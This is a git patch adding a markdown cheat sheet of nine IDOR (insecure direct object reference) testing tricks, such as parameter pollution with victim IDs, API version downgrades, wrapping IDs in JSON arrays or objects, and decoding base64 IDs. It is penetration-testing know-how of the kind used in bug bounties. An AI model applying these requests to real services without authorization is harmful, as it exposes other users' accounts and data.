From 233ec1f5b72071acc98227c1c4bf98fb63bd6ef1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Fri, 4 Sep 2020 17:41:20 +0700 Subject: [PATCH] Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips --- IDOR.md | 99 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 IDOR.md diff --git a/IDOR.md b/IDOR.md new file mode 100644 index 0000000..99e246e --- /dev/null +++ b/IDOR.md @@ -0,0 +1,99 @@ +## IDOR (Insecure Direct Object Reference) + +1. Add parameters onto the endpoints for example, if there was +```html +GET /api/v1/getuser +[...] +``` +Try this to bypass +```html +GET /api/v1/getuser?id=1234 +[...] +``` + +2. HTTP Parameter pollution + +```html +POST /api/get_profile +[...] +user_id=hacker_id&user_id=victim_id +``` + +3. Add .json to the endpoint + +```html +GET /v2/GetData/1234 +[...] +``` +Try this to bypass +```html +GET /v2/GetData/1234.json +[...] +``` + +4. Test on outdated API Versions + +```html +POST /v2/GetData +[...] +id=123 +``` +Try this to bypass +```html +POST /v1/GetData +[...] +id=123 +``` + +5. Wrap the ID with an array. + +```html +POST /api/get_profile +[...] +{"user_id":111} +``` +Try this to bypass +```html +POST /api/get_profile +[...] +{"id":[111]} +``` + +6. Wrap the ID with a JSON object + +```html +POST /api/get_profile +[...] +{"user_id":111} +``` +Try this to bypass +```html +POST /api/get_profile +[...] +{"user_id":{"user_id":111}} +``` + +7. JSON Parameter Pollution + +```html +POST /api/get_profile +[...] +{"user_id":"hacker_id","user_id":"victim_id"} +``` + +8. Try decode the ID, if the ID encoded using md5,base64,etc +```html +GET /GetUser/dmljdGltQG1haWwuY29t +[...] +``` +dmljdGltQG1haWwuY29t => victim@mail.com + +9. If the website using graphql, try to find IDOR using graphql! +```html +GET /graphql +[...] +``` +```html +GET /graphql.php?query= +[...] +```